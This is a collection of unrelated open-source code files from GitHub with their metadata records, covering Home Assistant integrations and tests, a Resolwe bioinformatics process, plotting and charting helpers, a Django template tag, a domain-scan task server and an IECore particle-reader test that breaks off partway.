# Behavior can be changed in child classes
self.async_write_ha_state()
@callback
def _on_device_update(self) -> None:
"""Update the entity state when device info has changed."""
if self._entry_data.available:
# Don't update the HA state yet when the device comes online.
# Only update the HA state when the full state arrives
# through the next entity state packet.
return
self._on_state_update()
@property
def _entry_id(self) -> str:
return self._entry_data.entry_id
@property
def _api_version(self) -> APIVersion:
return self._entry_data.api_version
@property
def _static_info(self) -> _InfoT:
# Check if value is in info database. Use a single lookup.
info = self._entry_data.info[self._component_key].get(self._key)
if info is not None:
return cast(_InfoT, info)
# This entity is in the process of being removed and has been removed from .info
# already, look in old_info
return cast(_InfoT, self._entry_data.old_info[self._component_key][self._key])
@property
def _device_info(self) -> EsphomeDeviceInfo:
assert self._entry_data.device_info is not None
return self._entry_data.device_info
@property
def _client(self) -> APIClient:
return self._entry_data.client
@property
def _state(self) -> _StateT:
return cast(_StateT, self._entry_data.state[self._state_type][self._key])
@property
def _has_state(self) -> bool:
return self._key in self._entry_data.state[self._state_type]
@property
def available(self) -> bool:
"""Return if the entity is available."""
device = self._device_info
if device.has_deep_sleep:
# During deep sleep the ESP will not be connectable (by design)
# For these cases, show it as available
return True
return self._entry_data.available
@property
def unique_id(self) -> str | None:
"""Return a unique id identifying the entity."""
if not self._static_info.unique_id:
return None
return self._static_info.unique_id
@property
def device_info(self) -> DeviceInfo:
"""Return device registry information for this entity."""
return DeviceInfo(
connections={(dr.CONNECTION_NETWORK_MAC, self._device_info.mac_address)}
)
@property
def name(self) -> str:
"""Return the name of the entity."""
return self._static_info.name
@property
def icon(self) -> str | None:
"""Return the icon."""
if not self._static_info.icon:
return None
return cast(str, ICON_SCHEMA(self._static_info.icon))
@property
def entity_registry_enabled_default(self) -> bool:
"""Return if the entity should be enabled when first added to the entity registry."""
return not self._static_info.disabled_by_default
@property
def entity_category(self) -> EntityCategory | None:
"""Return the category of the entity, if any."""
if not self._static_info.entity_category:
return None
return ENTITY_CATEGORIES.from_esphome(self._static_info.entity_category)
|
{
"content_hash": "4c10a7f485e6d8d73957b254654601d9",
"timestamp": "",
"source": "github",
"line_count": 776,
"max_line_length": 105,
"avg_line_length": 34.49226804123711,
"alnum_prop": 0.6150713591870283,
"repo_name": "mezz64/home-assistant",
"id": "23b6a6550e4889d99e89fa595e7ab8f1e7da864f",
"size": "26766",
"binary": false,
"copies": "1",
"ref": "refs/heads/dev",
"path": "homeassistant/components/esphome/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "2963"
},
{
"name": "PLSQL",
"bytes": "840"
},
{
"name": "Python",
"bytes": "52481895"
},
{
"name": "Shell",
"bytes": "6252"
}
],
"symlink_target": ""
}
|
"""Test the Logitech Harmony Hub activity switches."""
from datetime import timedelta
from homeassistant.components.harmony.const import DOMAIN
from homeassistant.components.switch import (
DOMAIN as SWITCH_DOMAIN,
SERVICE_TURN_OFF,
SERVICE_TURN_ON,
)
from homeassistant.const import (
ATTR_ENTITY_ID,
CONF_HOST,
CONF_NAME,
STATE_OFF,
STATE_ON,
STATE_UNAVAILABLE,
)
from homeassistant.util import utcnow
from .const import ENTITY_PLAY_MUSIC, ENTITY_REMOTE, ENTITY_WATCH_TV, HUB_NAME
from tests.common import MockConfigEntry, async_fire_time_changed
async def test_connection_state_changes(
harmony_client, mock_hc, hass, mock_write_config
):
"""Ensure connection changes are reflected in the switch states."""
entry = MockConfigEntry(
domain=DOMAIN, data={CONF_HOST: "192.0.2.0", CONF_NAME: HUB_NAME}
)
entry.add_to_hass(hass)
await hass.config_entries.async_setup(entry.entry_id)
await hass.async_block_till_done()
# mocks start with current activity == Watch TV
assert hass.states.is_state(ENTITY_WATCH_TV, STATE_ON)
assert hass.states.is_state(ENTITY_PLAY_MUSIC, STATE_OFF)
harmony_client.mock_disconnection()
await hass.async_block_till_done()
# Entities do not immediately show as unavailable
assert hass.states.is_state(ENTITY_WATCH_TV, STATE_ON)
assert hass.states.is_state(ENTITY_PLAY_MUSIC, STATE_OFF)
future_time = utcnow() + timedelta(seconds=10)
async_fire_time_changed(hass, future_time)
await hass.async_block_till_done()
assert hass.states.is_state(ENTITY_WATCH_TV, STATE_UNAVAILABLE)
assert hass.states.is_state(ENTITY_PLAY_MUSIC, STATE_UNAVAILABLE)
harmony_client.mock_reconnection()
await hass.async_block_till_done()
assert hass.states.is_state(ENTITY_WATCH_TV, STATE_ON)
assert hass.states.is_state(ENTITY_PLAY_MUSIC, STATE_OFF)
harmony_client.mock_disconnection()
harmony_client.mock_reconnection()
future_time = utcnow() + timedelta(seconds=10)
async_fire_time_changed(hass, future_time)
await hass.async_block_till_done()
assert hass.states.is_state(ENTITY_WATCH_TV, STATE_ON)
assert hass.states.is_state(ENTITY_PLAY_MUSIC, STATE_OFF)
async def test_switch_toggles(mock_hc, hass, mock_write_config):
"""Ensure calls to the switch modify the harmony state."""
entry = MockConfigEntry(
domain=DOMAIN, data={CONF_HOST: "192.0.2.0", CONF_NAME: HUB_NAME}
)
entry.add_to_hass(hass)
await hass.config_entries.async_setup(entry.entry_id)
await hass.async_block_till_done()
# mocks start with current activity == Watch TV
assert hass.states.is_state(ENTITY_REMOTE, STATE_ON)
assert hass.states.is_state(ENTITY_WATCH_TV, STATE_ON)
assert hass.states.is_state(ENTITY_PLAY_MUSIC, STATE_OFF)
# turn off watch tv switch
await _toggle_switch_and_wait(hass, SERVICE_TURN_OFF, ENTITY_WATCH_TV)
assert hass.states.is_state(ENTITY_REMOTE, STATE_OFF)
assert hass.states.is_state(ENTITY_WATCH_TV, STATE_OFF)
assert hass.states.is_state(ENTITY_PLAY_MUSIC, STATE_OFF)
# turn on play music switch
await _toggle_switch_and_wait(hass, SERVICE_TURN_ON, ENTITY_PLAY_MUSIC)
assert hass.states.is_state(ENTITY_REMOTE, STATE_ON)
assert hass.states.is_state(ENTITY_WATCH_TV, STATE_OFF)
assert hass.states.is_state(ENTITY_PLAY_MUSIC, STATE_ON)
# turn on watch tv switch
await _toggle_switch_and_wait(hass, SERVICE_TURN_ON, ENTITY_WATCH_TV)
assert hass.states.is_state(ENTITY_REMOTE, STATE_ON)
assert hass.states.is_state(ENTITY_WATCH_TV, STATE_ON)
assert hass.states.is_state(ENTITY_PLAY_MUSIC, STATE_OFF)
async def _toggle_switch_and_wait(hass, service_name, entity):
await hass.services.async_call(
SWITCH_DOMAIN,
service_name,
{ATTR_ENTITY_ID: entity},
blocking=True,
)
await hass.async_block_till_done()
|
{
"content_hash": "7941c5eba754741c3921a753ddd00780",
"timestamp": "",
"source": "github",
"line_count": 112,
"max_line_length": 78,
"avg_line_length": 35.19642857142857,
"alnum_prop": 0.7128361237950279,
"repo_name": "sander76/home-assistant",
"id": "1940c54e1123a5601330939138515264143f7280",
"size": "3942",
"binary": false,
"copies": "3",
"ref": "refs/heads/dev",
"path": "tests/components/harmony/test_switch.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "1795"
},
{
"name": "Python",
"bytes": "36548768"
},
{
"name": "Shell",
"bytes": "4910"
}
],
"symlink_target": ""
}
|
"""Run Cuffdiff 2.2."""
import os
from pathlib import Path
from plumbum import TEE
from resolwe.process import (
BooleanField,
Cmd,
DataField,
FileField,
FloatField,
JsonField,
ListField,
Persistence,
Process,
SchedulingClass,
StringField,
)
class Cuffdiff(Process):
"""Run Cuffdiff 2.2 analysis.
Cuffdiff finds significant changes in transcript expression, splicing, and
promoter use. You can use it to find differentially expressed genes and
transcripts, as well as genes that are being differentially regulated at
the transcriptional and post-transcriptional level. See
[here](http://cole-trapnell-lab.github.io/cufflinks/cuffdiff/) and
[here](https://software.broadinstitute.org/cancer/software/genepattern/modules/docs/Cuffdiff/7)
for more information.
"""
slug = "cuffdiff"
name = "Cuffdiff 2.2"
process_type = "data:differentialexpression:cuffdiff"
version = "3.4.0"
category = "Differential Expression"
scheduling_class = SchedulingClass.BATCH
persistence = Persistence.CACHED
requirements = {
"expression-engine": "jinja",
"executor": {
"docker": {"image": "public.ecr.aws/genialis/resolwebio/rnaseq:6.0.0"}
},
"resources": {"cores": 10, "memory": 8192},
}
data_name = "Cuffdiff results"
class Input:
"""Input fields to process Cuffdiff."""
case = ListField(
DataField("cufflinks:cuffquant"),
label="Case samples",
)
control = ListField(
DataField("cufflinks:cuffquant"),
label="Control samples",
)
labels = ListField(
StringField(),
label="Group labels",
description="Define labels for each sample group.",
default=["control", "case"],
)
annotation = DataField(
"annotation",
label="Annotation (GTF/GFF3)",
description="A transcript annotation file produced by "
"cufflinks, cuffcompare, or other tool.",
)
genome = DataField(
"seq:nucleotide",
label="Run bias detection and correction algorithm",
required=False,
description="Provide Cufflinks with a multifasta file "
"(genome file) via this option to instruct it to run a "
"bias detection and correction algorithm which can "
"significantly improve accuracy of transcript abundance "
"estimates.",
)
multi_read_correct = BooleanField(
label="Do initial estimation procedure to more accurately "
"weight reads with multiple genome mappings",
default=False,
)
create_sets = BooleanField(
label="Create gene sets",
description="After calculating differential gene "
"expression, create gene sets for up-regulated genes, "
"down-regulated genes and all genes.",
default=False,
)
gene_logfc = FloatField(
label="Log2 fold change threshold for gene sets",
description="Genes above Log2FC are considered as "
"up-regulated and genes below -Log2FC as down-regulated.",
default=1.0,
hidden="!create_sets",
)
gene_fdr = FloatField(
label="FDR threshold for gene sets",
default=0.05,
hidden="!create_sets",
)
fdr = FloatField(
label="Allowed FDR",
description="The allowed false discovery rate. The default is 0.05.",
default=0.05,
)
library_type = StringField(
label="Library type",
description="In cases where Cufflinks cannot determine the "
"platform and protocol used to generate input reads, you "
"can supply this information manually, which will allow "
"Cufflinks to infer source strand information with certain "
"protocols. The available options are listed below. For "
"paired-end data, we currently only support protocols "
"where reads point towards each other: fr-unstranded - "
"Reads from the left-most end of the fragment (in "
"transcript coordinates) map to the transcript strand and "
"the right-most end maps to the opposite strand; "
"fr-firststrand - Same as above except we enforce the rule "
"that the right-most end of the fragment (in transcript "
"coordinates) is the first sequenced (or only sequenced "
"for single-end reads). Equivalently, it is assumed that "
"only the strand generated during first strand synthesis "
"is sequenced; fr-secondstrand - Same as above except we "
"enforce the rule that the left-most end of the fragment "
"(in transcript coordinates) is the first sequenced (or "
"only sequenced for single-end reads). Equivalently, it is "
"assumed that only the strand generated during second "
"strand synthesis is sequenced.",
default="fr-unstranded",
choices=[
("fr-unstranded", "fr-unstranded"),
("fr-firststrand", "fr-firststrand"),
("fr-secondstrand", "fr-secondstrand"),
],
)
library_normalization = StringField(
label="Library normalization method",
description="You can control how library sizes (i.e. "
"sequencing depths) are normalized in Cufflinks and "
"Cuffdiff. Cuffdiff has several methods that require "
"multiple libraries in order to work. Library "
"normalization methods supported by Cufflinks work on one "
"library at a time.",
default="geometric",
choices=[
("geometric", "geometric"),
("classic-fpkm", "classic-fpkm"),
("quartile", "quartile"),
],
)
dispersion_method = StringField(
label="Dispersion method",
description="Cuffdiff works by modeling the variance in "
"fragment counts across replicates as a function of the "
"mean fragment count across replicates. Strictly speaking, "
"it models a quantity called dispersion - the variance "
"present in a group of samples beyond what is expected "
"from a simple Poisson model of RNA-Seq. You can control "
"how Cuffdiff constructs its model of dispersion in locus "
"fragment counts. Each condition that has replicates can "
"receive its own model, or Cuffdiff can use a global model "
"for all conditions. All of these policies are identical "
"to those used by DESeq (Anders and Huber, Genome Biology, "
"2010).",
default="pooled",
choices=[
("pooled", "pooled"),
("per-condition", "per-condition"),
("blind", "blind"),
("poisson", "poisson"),
],
)
class Output:
"""Output fields of the process Cuffdiff."""
raw = FileField("Differential expression")
de_json = JsonField(label="Results table (JSON)")
de_file = FileField(label="Results table (file)")
transcript_diff_exp = FileField(
label="Differential expression (transcript level)"
)
tss_group_diff_exp = FileField(
label="Differential expression (primary transcript)"
)
cds_diff_exp = FileField(label="Differential expression (coding sequence)")
cuffdiff_output = FileField(label="Cuffdiff output")
source = StringField(label="Gene ID database")
species = StringField(label="Species")
build = StringField(label="Build")
feature_type = StringField(label="Feature type")
def run(self, inputs, outputs):
"""Run the analysis."""
cuffquants = inputs.case + inputs.control
for c in cuffquants:
if c.output.source != cuffquants[0].output.source:
self.error(
"Input samples are of different Gene ID databases: "
f"{c.output.source} and {cuffquants[0].output.source}."
)
if c.output.species != cuffquants[0].output.species:
self.error(
"Input samples are of different Species: "
f"{c.output.species} and {cuffquants[0].output.species}."
)
if c.output.build != cuffquants[0].output.build:
self.error(
"Input samples are of different Genome builds: "
f"{c.output.build} and {cuffquants[0].output.build}."
)
for case in inputs.case:
if case in inputs.control:
self.error(
"Case and Control groups must contain unique "
f"samples. Sample {case.sample_name} is in both Case "
"and Control group."
)
case_paths = ",".join([case.output.cxb.path for case in inputs.case])
control_paths = ",".join(
[control.output.cxb.path for control in inputs.control]
)
labels = ",".join(inputs.labels)
outputs.source = cuffquants[0].output.source
outputs.species = cuffquants[0].output.species
outputs.build = cuffquants[0].output.build
outputs.feature_type = "gene"
self.progress(0.1)
params = [
"--output-dir",
"./",
"--num-threads",
self.requirements.resources.cores,
"--labels",
labels,
"--FDR",
inputs.fdr,
"--library-type",
inputs.library_type,
"--library-norm-method",
inputs.library_normalization,
"--dispersion-method",
inputs.dispersion_method,
"--quiet",
]
if inputs.genome:
params.extend(["--frag-bias-correct", inputs.genome.output.fasta.path])
if inputs.multi_read_correct:
params.append("--multi-read-correct")
return_code, _, _ = Cmd["cuffdiff"][params][
inputs.annotation.output.annot.path, control_paths, case_paths
] & TEE(retcode=None)
if return_code:
self.error("Error while computing differential expression with Cuffdiff.")
self.progress(0.90)
exp_file = "cuffdiff.tab"
os.rename("gene_exp.diff", exp_file)
files_list = [
"cds.*",
"isoforms.*",
"genes.*",
"tss_groups.*",
"read_groups.*",
"promoters.diff",
"splicing.diff",
"cds_exp.diff",
exp_file,
"isoform_exp.diff",
"tss_group_exp.diff",
]
zip_file = "cuffdiff_output.zip"
return_code, _, _ = Cmd["zip"][zip_file][files_list] & TEE(retcode=None)
if return_code:
self.error("Error while compressing Cuffdiff files.")
args = [
exp_file,
"de_data.json",
"de_file.tab.gz",
"--gene_id",
"gene_id",
"--fdr",
"q_value",
"--pvalue",
"p_value",
"--logfc",
"log2(fold_change)",
"--stat",
"test_stat",
]
return_code, _, _ = Cmd["parse_diffexp.py"][args] & TEE(retcode=None)
if return_code:
self.error("Error while parsing DGE results.")
(Cmd["gzip"][exp_file])()
outputs.raw = f"{exp_file}.gz"
outputs.de_json = "de_data.json"
outputs.de_file = "de_file.tab.gz"
outputs.transcript_diff_exp = "isoform_exp.diff"
outputs.cds_diff_exp = "cds_exp.diff"
outputs.tss_group_diff_exp = "tss_group_exp.diff"
outputs.cuffdiff_output = "cuffdiff_output.zip"
if inputs.create_sets:
out_dir = "gene_sets"
gene_set_args = [
"--dge_file",
"de_file.tab.gz",
"--out_dir",
out_dir,
"--analysis_name",
self.name,
"--tool",
"Cuffdiff",
"--logfc",
inputs.gene_logfc,
"--fdr",
inputs.gene_fdr,
]
return_code, _, _ = Cmd["create_gene_sets.py"][gene_set_args] & TEE(
retcode=None
)
if return_code:
self.error("Error while creating gene sets.")
for gene_file in sorted(Path(out_dir).glob("*.tab.gz")):
gene_file.rename(Path() / gene_file.name)
process_inputs = {
"src": str(gene_file.name),
"source": cuffquants[0].output.source,
"species": cuffquants[0].output.species,
}
self.run_process("upload-geneset", process_inputs)
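# For illustration only (file names are placeholders, not from the original
# process): with two cuffquant samples per group and default inputs, the
# assembled command resembles
#
#     cuffdiff --output-dir ./ --num-threads 10 --labels control,case \
#         --FDR 0.05 --library-type fr-unstranded \
#         --library-norm-method geometric --dispersion-method pooled --quiet \
#         annotation.gtf control_1.cxb,control_2.cxb case_1.cxb,case_2.cxb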
|
{
"content_hash": "a8844a62ba30e19f5cc9a85da037274c",
"timestamp": "",
"source": "github",
"line_count": 353,
"max_line_length": 99,
"avg_line_length": 37.756373937677054,
"alnum_prop": 0.5481692677070829,
"repo_name": "genialis/resolwe-bio",
"id": "617b303379ff1e13970bd36f0854c2b0186b9a03",
"size": "13328",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "resolwe_bio/processes/differential_expression/cuffdiff.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "10553"
},
{
"name": "PLpgSQL",
"bytes": "4491"
},
{
"name": "Python",
"bytes": "1729619"
},
{
"name": "R",
"bytes": "20619"
},
{
"name": "Shell",
"bytes": "6713"
}
],
"symlink_target": ""
}
|
import sys
import os
import re
import scipy.stats as stats
from matplotlib.pyplot import *
from numpy import *
# Goal: follow the jitter of some nodes (ideal case, massive join/departure, presence of colluders)
print "Usage: ./7_log_size.py dir"
def roundId_jitteredList(dir):
''' Accumulate, per round, the log size and total size (divided by 1e6) summed across the logSize files found in dir.
Return the list of round ids together with the associated cumulative log sizes and total sizes. '''
roundList = []
logSizeList = [] # Contains the proportion of jittered node per round
totalSizeList = []
nb_nodes = 0
for filename in os.listdir(dir):
if re.search("logSize", filename) == None:
continue
f = open(dir+"/"+filename, "r")
nb_nodes += 1
roundId = 1
for line in f:
line = map(int, line.split('\t'))
logSize = line[0]
totalSize = line[1]
if roundId not in roundList:
roundList.append(roundId)
roundList.sort()
logSizeList.insert(roundList.index(roundId), logSize/1000000.0)
totalSizeList.insert(roundList.index(roundId), totalSize/1000000.0)
else:
logSizeList[roundList.index(roundId)] += logSize/1000000.0
totalSizeList[roundList.index(roundId)] += totalSize/1000000.0
roundId += 1
f.close()
#for i in range(len(jitteredRoundsList)):
#jitteredRoundsList[i] = (jitteredRoundsList[i] * 100) / nb_nodes
return (roundList, logSizeList, totalSizeList)
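# Assumed input format (an assumption for illustration, not stated in the
# original script): each "*logSize*" file is expected to contain one line per
# round with two tab-separated integers, the log size and the total size,
# which are divided by 1e6 before plotting, e.g.
#
#     524288    1048576
#     786432    1310720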
(x, y, z) = roundId_jitteredList(sys.argv[1])
p1 = plot(x, y, 'k', linewidth=2, label="Log size") # k for black
p2 = plot(x, z, 'k:', linewidth=2, label="Total size") # k for black
#vlines(300, 0, 2000, color='k', linestyles='dashed')
#plt.xticks(tf)
#xt = linspace(1, len(jitteredRoundsList), 4)
#xticks(xt)
#title('my plot')
tick_params(axis='both', which='major', labelsize=18)
ylabel('Memory in Mb', fontsize=18)
xlabel('Time in seconds', fontsize=18)
legend(loc="lower right", prop={'size':18})
#ylim(ymax=100, ymin=0)
#xlim(xmax=600, xmin=0)
show()
#savefig('percentageJitteredRounds.pdf')
#os.system("pdfcrop percentageNonJitteredRounds.pdf percentageNonJitteredRounds.pdf")
|
{
"content_hash": "45aa922db928384579e65a46dc01ad96",
"timestamp": "",
"source": "github",
"line_count": 74,
"max_line_length": 99,
"avg_line_length": 30.527027027027028,
"alnum_prop": 0.6489597166888004,
"repo_name": "jdecouchant/PAG",
"id": "a9b963b1afb4c50023b3b7c7a876648f7e11b983",
"size": "2277",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "Java/javaCode/scripts/7_log_size.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "3355"
},
{
"name": "C++",
"bytes": "711450"
},
{
"name": "D",
"bytes": "17931"
},
{
"name": "FreeMarker",
"bytes": "2626"
},
{
"name": "Groff",
"bytes": "1325577"
},
{
"name": "Java",
"bytes": "151786"
},
{
"name": "Makefile",
"bytes": "246918"
},
{
"name": "Python",
"bytes": "24963"
},
{
"name": "Shell",
"bytes": "3173753"
}
],
"symlink_target": ""
}
|
from typing import Container, Dict, Type
from pydantic import BaseModel, create_model
from sqlalchemy.inspection import inspect
from sqlalchemy.orm.properties import ColumnProperty
def sqlalchemy_to_pydantic(
db_model: Type, *, include: Dict[str, type] = None, exclude: Container[str] = None
) -> Type[BaseModel]:
"""
Mostly copied from https://github.com/tiangolo/pydantic-sqlalchemy
"""
if exclude is None:
exclude = []
mapper = inspect(db_model)
fields = {}
for attr in mapper.attrs:
if isinstance(attr, ColumnProperty):
if attr.columns:
column = attr.columns[0]
python_type = column.type.python_type
name = attr.key
if name in exclude:
continue
default = None
if column.default is None and not column.nullable:
default = ...
fields[name] = (python_type, default)
if bool(include):
for name, python_type in include.items():
default = None
fields[name] = (python_type, default)
pydantic_model = create_model(
db_model.__name__, **fields # type: ignore
)
return pydantic_model
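# Illustrative usage (hypothetical model, not part of the original file):
#
#     class User(Base):
#         __tablename__ = "users"
#         id = Column(Integer, primary_key=True)
#         name = Column(String, nullable=False)
#
#     UserSchema = sqlalchemy_to_pydantic(User, exclude=["id"])
#     UserSchema(name="alice")  # pydantic model with the required field "name"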
|
{
"content_hash": "8b0816bd651d4384a67bb3b0dce2f96d",
"timestamp": "",
"source": "github",
"line_count": 37,
"max_line_length": 86,
"avg_line_length": 33.78378378378378,
"alnum_prop": 0.5872,
"repo_name": "isislab/CTFd",
"id": "cd3ed4f6f19656dc2865b3c2638b3e200f510da2",
"size": "1250",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "CTFd/api/v1/helpers/schemas.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "13062"
},
{
"name": "HTML",
"bytes": "156198"
},
{
"name": "JavaScript",
"bytes": "38944"
},
{
"name": "Mako",
"bytes": "494"
},
{
"name": "Python",
"bytes": "146388"
},
{
"name": "Shell",
"bytes": "611"
}
],
"symlink_target": ""
}
|
from django import template
from django.conf import settings
from GChartWrapper import Sparkline
from camo import CamoClient
from ...comments.models import Comment
register = template.Library()
@register.simple_tag
def graph(professor):
scores = []
comments = Comment.objects.filter(
professor=professor, responsibility__gt=0)
for c in comments:
scores.append(float(c.responsibility+c.personality +
c.workload+c.difficulty)*5)
if len(scores) == 0:
scores.append(0)
if len(scores) == 1:
scores.append(scores[0])
chart = Sparkline(scores, encoding='text')
chart.color('0077CC')
chart.size(450, 262)
chart.marker('B', 'E6F2FA', 0, 0, 0)
chart.line(1, 0, 0)
chart.axes('y')
if not settings.DEBUG:
client = CamoClient(settings.CAMO_URL, key=settings.CAMO_KEY)
url = client.image_url(chart.url)
else:
url = chart.url
return url
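# Illustrative template usage (not part of the original file): the tag is loaded
# by its module name and called with a professor object from the context, e.g.
#
#     {% load graph_creation %}
#     <img src="{% graph professor %}" alt="Comment score sparkline">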
|
{
"content_hash": "86a5e8373d334de5b4c9057bf7ce98eb",
"timestamp": "",
"source": "github",
"line_count": 40,
"max_line_length": 69,
"avg_line_length": 24.3,
"alnum_prop": 0.6399176954732511,
"repo_name": "Jpadilla1/notaso",
"id": "79340cd1078653969c4e71b7a6f67fc3cd0cd4b5",
"size": "972",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "notaso/professors/templatetags/graph_creation.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "16583"
},
{
"name": "HTML",
"bytes": "118520"
},
{
"name": "JavaScript",
"bytes": "4052"
},
{
"name": "Python",
"bytes": "80984"
}
],
"symlink_target": ""
}
|
"""
The QueuedDomainRequestServer handles incoming scan_task requests.
"""
"""
################################################################################
Messages:
DomainSearchScanner -> QueuedDomainRequestServer:
"request": "task"
QueuedDomainRequestServer -> DomainSearchScanner: scan request
"response": {
"task": {
"domain": "example.com",
"request_id": 1
}
}
QueuedDomainRequestServer -> DomainSearchScanner: shutdown triggered
"response": {
"msg": "shutdown"
}
################################################################################
Queue structure:
queued_domain_request_queue = (request_id, domain)
request_id = int
domain = str
################################################################################
"""
import time
import json
import queue
import socketserver
from additional import Config
from additional.Logging import Logging
################################################################################
class BasicThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
pass
class QueuedDomainRequestServer(BasicThreadedTCPServer):
# if the server stops/starts quickly, don't fail because of "port in use"
allow_reuse_address = True
def __init__(self, addr, handler, arguments):
self.scanners = arguments[0]
self.scanners_lock = arguments[1]
self.running_event = arguments[2]
self.queued_domain_request_queue = arguments[3]
self.log = Logging(self.__class__.__name__).get_logger()
BasicThreadedTCPServer.__init__(self, addr, handler)
################################################################################
class QueuedDomainRequestHandler(socketserver.BaseRequestHandler):
"""
This class tries to get a new entry from the queued_domain_request queue as long
as the server is in the running state.
"""
def _add_scanner(self):
"""
Method to add a scanner to the list of connected scanners.
"""
with self.server.scanners_lock:
self.server.scanners[self.client_address[1]] = (
self.client_address[0], time.strftime("%d.%m.%Y %H:%M:%S"))
def _remove_scanner(self):
"""
Method to remove a scanner from the list of connected scanners.
"""
with self.server.scanners_lock:
self.server.scanners.pop(self.client_address[1])
############################################################################
def handle(self):
"""
Method to handle the request.
"""
# adds scanner to the list of connected scanners
self._add_scanner()
last_request = None
while self.server.running_event.is_set():
try:
data = self.request.recv(1024).decode('UTF-8').strip()
# detects disconnected scanner
if not data:
raise ConnectionAbortedError
message = json.loads(data)
# validates message
if 'request' not in message or message['request'] != 'task':
raise ValueError
except ValueError:
self.server.log.error('Invalid message: {}'.format(data))
break
except (ConnectionAbortedError, ConnectionResetError,
ConnectionRefusedError):
# adds the last task back to the queue if not None
if last_request:
self.server.queued_domain_request_queue.put(last_request)
self.server.log.info('Connection aborted: {}:{}'
.format(self.client_address[0], self.client_address[1]))
break
####################################################################
self.server.log.info('Received queued-domain request')
####################################################################
while 1:
# checks if server wants to shut down
if not self.server.running_event.is_set():
# informs the scanner of an upcoming server shutdown
self.request.sendall(bytes(json.dumps({
'response': {
'msg': 'shutdown'
}
}), 'UTF-8'))
break
try:
# tries to get a request from queued-domain-request queue
request = self.server.queued_domain_request_queue.get(
timeout=Config.queued_domain_request_server_timeout)
request_id = request[0]
domain = request[1]
# sends the received domain to the scanner
self.request.sendall(bytes(json.dumps({
'response': {
'task': {
'domain': domain,
'request_id': request_id
}
}
}), 'UTF-8'))
# saves the last request to add it back to the queue if
# meanwhile the scanner has disconnected
last_request = request
self.server.queued_domain_request_queue.task_done()
break
except queue.Empty:
pass
self._remove_scanner()
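# Illustrative client-side sketch (hedged; host, port and buffer handling are
# simplified assumptions, not part of the original module). A scanner following
# the protocol documented above sends {"request": "task"} and reads back either
# a task or a shutdown notice:
#
#     import json, socket
#
#     with socket.create_connection(("localhost", 5000)) as sock:
#         sock.sendall(json.dumps({"request": "task"}).encode("UTF-8"))
#         response = json.loads(sock.recv(1024).decode("UTF-8"))["response"]
#         if response.get("msg") == "shutdown":
#             pass  # stop scanning
#         else:
#             task = response["task"]  # {"domain": ..., "request_id": ...}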
|
{
"content_hash": "f2e7415520d85ce3f80e6385483f0535",
"timestamp": "",
"source": "github",
"line_count": 192,
"max_line_length": 82,
"avg_line_length": 29.390625,
"alnum_prop": 0.4733297891192628,
"repo_name": "andreas-kowasch/DomainSearch",
"id": "72074dba31cd6f67a8515f22393c88ea1c674811",
"size": "5668",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "DomainSearchServer/additional/QueuedDomainRequestServer.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "332852"
},
{
"name": "Shell",
"bytes": "1135"
}
],
"symlink_target": ""
}
|
import random
def random_data(points=50, maximum=100):
return [random.random() * maximum for a in xrange(points)]
def random_colour(min=20, max=200):
func = lambda: int(random.random() * (max-min) + min)
r, g, b = func(), func(), func()
return '%02X%02X%02X' % (r, g, b)
|
{
"content_hash": "291f0f8c0ab044106b469ec9ec55b988",
"timestamp": "",
"source": "github",
"line_count": 10,
"max_line_length": 62,
"avg_line_length": 29,
"alnum_prop": 0.6172413793103448,
"repo_name": "gregdingle/genetify",
"id": "2bedf6e49e22d95f4772405ac275936518f16aea",
"size": "290",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "pygooglechart/examples/helper.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "JavaScript",
"bytes": "94586"
},
{
"name": "PHP",
"bytes": "100321"
},
{
"name": "Python",
"bytes": "43424"
},
{
"name": "R",
"bytes": "14111"
},
{
"name": "Shell",
"bytes": "497"
}
],
"symlink_target": ""
}
|
from __future__ import with_statement
import unittest
import sys
import os
import IECore
import IECoreScene
class TestPDCReader( unittest.TestCase ) :
def testConstruction( self ) :
r = IECore.Reader.create( "test/IECore/data/pdcFiles/particleShape1.250.pdc" )
self.assert_( r.isInstanceOf( "ParticleReader" ) )
self.assertEqual( type( r ), IECoreScene.PDCParticleReader )
self.assertEqual( r["fileName"].getValue().value, "test/IECore/data/pdcFiles/particleShape1.250.pdc" )
def testReadWithPrimVarConversion( self ) :
r = IECore.Reader.create( "test/IECore/data/pdcFiles/particleShape1.250.pdc" )
r.parameters()["realType"].setValue( "native" )
self.assertEqual( type( r ), IECoreScene.PDCParticleReader )
self.assertTrue( r.parameters()["convertPrimVarNames"].getTypedValue() )
self.assertEqual( r.numParticles(), 25 )
attrNames = r.attributeNames()
expectedAttrNamesAndTypes = {
"particleId" : IECore.DoubleVectorData,
"mass" : IECore.DoubleVectorData,
"lastWorldVelocity" : IECore.V3dVectorData,
"worldVelocityInObjectSpace" : IECore.V3dVectorData,
"worldVelocity" : IECore.V3dVectorData,
"lastWorldPosition" : IECore.V3dVectorData,
"worldPosition" : IECore.V3dVectorData,
"acceleration" : IECore.V3dVectorData,
"lastVelocity" : IECore.V3dVectorData,
"velocity" : IECore.V3dVectorData,
"lastPosition" : IECore.V3dVectorData,
"position" : IECore.V3dVectorData,
"lifespanPP" : IECore.DoubleVectorData,
"finalLifespanPP" : IECore.DoubleVectorData,
"emitterId" : IECore.DoubleVectorData,
"birthTime" : IECore.DoubleVectorData,
"age" : IECore.DoubleVectorData,
}
self.assertEqual( len( attrNames ), len( expectedAttrNamesAndTypes ) )
for i in expectedAttrNamesAndTypes.keys() :
self.assert_( i in attrNames )
expectedConvertedAttrNamesAndTypes = {
"particleId" : IECore.DoubleVectorData,
"mass" : IECore.DoubleVectorData,
